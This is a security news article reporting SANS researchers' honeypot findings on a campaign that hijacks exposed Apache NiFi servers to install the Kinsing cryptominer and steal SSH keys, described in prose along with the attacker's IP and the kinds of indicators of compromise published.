Hackers are hunting for exposed Apache NiFi instances for cryptocurrency mining

Hackers are hunting for exposed Apache NiFi instances for cryptocurrency mining

Threat actors are actively scanning the internet for unprotected Apache NiFi instances to ensnare them into a cryptocurrency mining botnet, warn researchers at the SANS Internet Storm Center.

The ongoing campaign was first spotted on May 19, when the researchers noticed a significant rise in HTTP requests for ‘/nifi.’ After redirecting some of the requests to a virtual Apache NiFi instance in their honeypot, the researchers discovered that threat actors either install a cryptocurrency miner, or perform lateral movement by searching the server for SSH credentials.

The attack scripts are kept in memory only (i.e., they are not saved to the file system). Persistence is achieved via timed processors or entries to cron, the SANS Institute says.

“An attacker for such a misconfigured system can access all the data processed by NiFi and read/modify/delete the NiFi configuration,” Dr. Johannes Ullrich, dean of research for SANS Technology Institute, said in a blog post.

The cryptominer script attempts to remove the “/var/log/syslog” file, disable the firewall and monitoring tools, find and terminate other cryptomining tools, install the Kinsing cryptominer, make standard temporary directories immutable (likely to prevent additional exploits), and add a cron job to run ni.sh every minute.

On a few occasions, the same threat actor also attempted to execute a different script, spre.sh, which attempted to collect SSH keys from the infected host to connect to other systems within the victim’s organization.

Ullrich noted that the requests came almost exclusively from the IP address 109.207.200.43. In addition to scanning for NiFi, the same IP sent requests for /boaform/admin/formLogin. Various routers use this URL as a login page and are often checked for weak passwords and other vulnerabilities.

The organization provided Indicators of Compromise (IoCs) associated with malicious activity, such as additional cron jobs, disrupted ssh connections, rogue "processors" in theNiFi configuration, IP addresses, and hashes of the scripts and the cryptominer.

Back to the list

Latest Posts

Hazy Hawk hijacks abandoned cloud resources of global orgs to spread scams and malware

Hazy Hawk hijacks abandoned cloud resources of global orgs to spread scams and malware

Hazy Hawk leverages “dangling” DNS CNAME records, allowing attackers to register the abandoned services and takeover subdomains associated with trusted brands.
21 May 2025
100+ websites lured victims into downloading malicious Chrome extensions

100+ websites lured victims into downloading malicious Chrome extensions

Once users were convinced to install the extensions, the malicious code harvested browser session cookies.
21 May 2025
EU sanctions Russian disinformation clusters operating across Africa and Europe

EU sanctions Russian disinformation clusters operating across Africa and Europe

The EU sanctioned Stark Industries, a Moldova-based bulletproof hosting company that has hosted a wide array of malicious activity, ranging from malware servers to websites linked to Doppelgang.
21 May 2025
Popular Posts
Featured vulnerabilities
Improper preservation of permissions in containerd CRI plugin
Low Patched | 21 May, 2025
Spoofing attack in Firefox for iOS
Medium Patched | 21 May, 2025
Remote denial of service in ISC BIND
Medium Patched | 21 May, 2025
Swagger UI update for libxml
High Patched | 21 May, 2025
Microcode signature verification bypass in AMD processors
Low Patched | 21 May, 2025